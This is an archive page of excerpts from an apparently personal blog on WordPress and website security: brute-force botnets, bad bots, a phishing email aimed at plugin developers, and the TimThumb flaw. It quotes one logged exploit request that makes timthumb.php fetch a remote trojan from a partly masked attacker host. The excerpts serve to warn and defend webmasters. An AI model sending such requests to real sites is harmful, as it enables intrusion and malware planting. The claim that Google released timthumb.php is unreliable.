Category Archives: Internet Security
Just when I thought I’d seen it all, I get some really weird spam e-mail from a webform response. Every possible field filed in with a website URL, or nonsense text. And there are lot’s of fields. Stranger still, the mail form responds to a promotion that ended in October last 2011…
Apparent Botnet Attacked My WordPress Website
What appeared to be a botnet attacked one of my sites (tech.graphicline.co.za) this morning in a brute-force wp-login attempt from multiple IP addresses. This was the most coordinated attack against any of my sites I’ve experienced. Usually the hacker bots I see use up to 6 IP’s in these attacks – 146 IPs is serious stuff…
146 IP’s Used in Simultaneous Attack
The IP’s listed below are the guilty parties to this brute-force login attack on the site. The main attack started at 05h09 GMT this morning (November 25, 2012) and continued until 05h15 GMT. A second but less intense attacked followed; starting from 05h16 GMT tailing off until ending at 05h43 GMT
Hacker Bot FreeWebMonitoring SiteChecker/0.1 Pays a Visit
Bad bot “FreeWebMonitoring SiteChecker/0.1 (+http://www.freewebmonitoring.com)” paid a visit to one of my websites yesterday from IP address 188.8.131.52 which belongs to Canadian service provider: Canada Montreal Thst Golf Inc.
The full range of IP’s owned by Canada Montreal Thst Golf Inc. is 184.108.40.206 - 220.127.116.11
This bot is not the bot used by freewebmonitoring.com. Their bot is “FreeWebMonitoring SiteChecker/0.2 (+http://www.freewebmonitoring.com/bot.html)”
Baidu and Yandex Bots Forbidden Access
That’s it folk, I have denied access to the Baidu and Yandex web spiders. I don’t want them crawling my sites, I don’t want them crawling my clients’ sites (unless the client wants them to of course). Both these bots do not follow advanced robots.txt disallow rules, and crawl areas of the sites I don’t want indexed… In particular I don’t want them continually searching my sites for non-existent RSS feeds and /trackback urls thus generating excessive page not found errors.
I am becoming stricter with web bots that do not comply with the more advanced robots.txt rules, eg “disallow /feed” and wildcards. Google obeys these rules, Bing obeys these rules, any other worthwhile search engine should also obey these rules.
verify-Compliance_Page | notified-Compliance_Page
I noticed a few 404 page not found errors in activity logs for several sites today using these strings; verify-Compliance_Page?aHR0cDovL3d3dy5ncmFwaGljbGluZS5jby56YS8= and notified-Compliance_Page with the same rubbish string on the end. When I find odd GET requests I invariably try to find out more information about what the ‘visitor’ is trying to do. Are they trying to hack, access forbidden areas, upload malware or post spam…
As far as verify-Compliance_Page and notified-Compliance_Page are concerned, the amount of substantiated information is notable only in it’s scarcity. So for any webmaster who is also looking for this information about these odd GET requests, this is what I was able to establish.
Phishing Scam Targets WordPress Plugin Developers
What may be the first phishing scam specifically targeting WordPress Plugin authors has been discovered. The scam comes in the form of an e-mail claiming the developers plugin has been removed from the WordPress Repository, and tells the plugin author to use the link in the mail to login and change their password.
The e-mail uses the Subject line “[WordPress.org Plugins] Urgent: Your Plugin Has Been Removed” and has this message content
Dear WordPress Plugin Developer,
Unfortunately, a plugin you are hosting has been temporarily removed from the WordPress repository. We are going to manually review your plugin because it has been reported for violating our Terms of Service. If your plugin does not get approved then it will be permanently removed from the WordPress repository.
You can check if your plugin has been approved or rejected at…
This is not an official WordPress email!
Microsoft Security Essentials Under Microscope
A look at Microsoft Security Essentials, the free anti-virus application from Microsoft. Is Microsoft Security Essentials any good? Will it protect a Windows PC from most common threats? Can MSE compete with commercial security applications?
Over the next few months we will see.
Annoyed with Commercial AV Software.
I have become increasingly annoyed with commercial anti-virus applications. They have become overpriced, use too much system resources, interfere with other applications, or slow down internet access. Worse still, none of the apps are able to detect every virus or malware… An example is Trojan Generic 24, which seems to be only detected by AVG (but doesn’t stop or remove it). Trend Micro Titanium and Norton AV don’t find all versions of this dangerous trojan.
Hackers Using Picasa Spoof for Web Malware
Strange looking referer URLs and GET requests that appear to be Picasa are being used by hackers to find website vulnerabilities to inject malware or spam. Examining the details of the referer reveals something like this example /wp-content/themes/biznizz/thumb.php?src=http://picasa.com.jcibuenos*****.com.ar/2.php (stars replace the actual characters in string for your safety – leads nowhere). This particular example will inject malware using the WordPress TimThumb exploit. The file 2.php contains a trojan horse!
Picasa is of course picasa.google.com, but the similarity can lead the unwary to disregard the source. These strings are typically long, similar in appearance to a Google search request string. Any URL containing this odd string (or similar) should be regarded as extremely suspicious, and the IP should at least be checked for known bad behaviour and blocked from accessing the website. The string is often seen along with WordPress TimThumb exploit attempts.
TimThumb PHP WordPress Vulnerability
An image re-size script timthumb.php released by Google and used by many Word Press (self hosted) themes and plugins had a vulnerability allowing hackers to load malicious script files to a Word Press website.
Hackers use automated bots to trawl sites looking for timthumb.php files in certain folders e.g. wp-content/themes/ and /wp-content/plugins. Once the bot has found timthumb.php the hacker will try to attack the site.
The vulnerability was discovered in August 2011, and the file was immediately patched to prevent these attacks. Judging by the large number of bots still looking for these files, there must be many un-patched versions still used on Word Press blogs and sites. Read the rest of this entry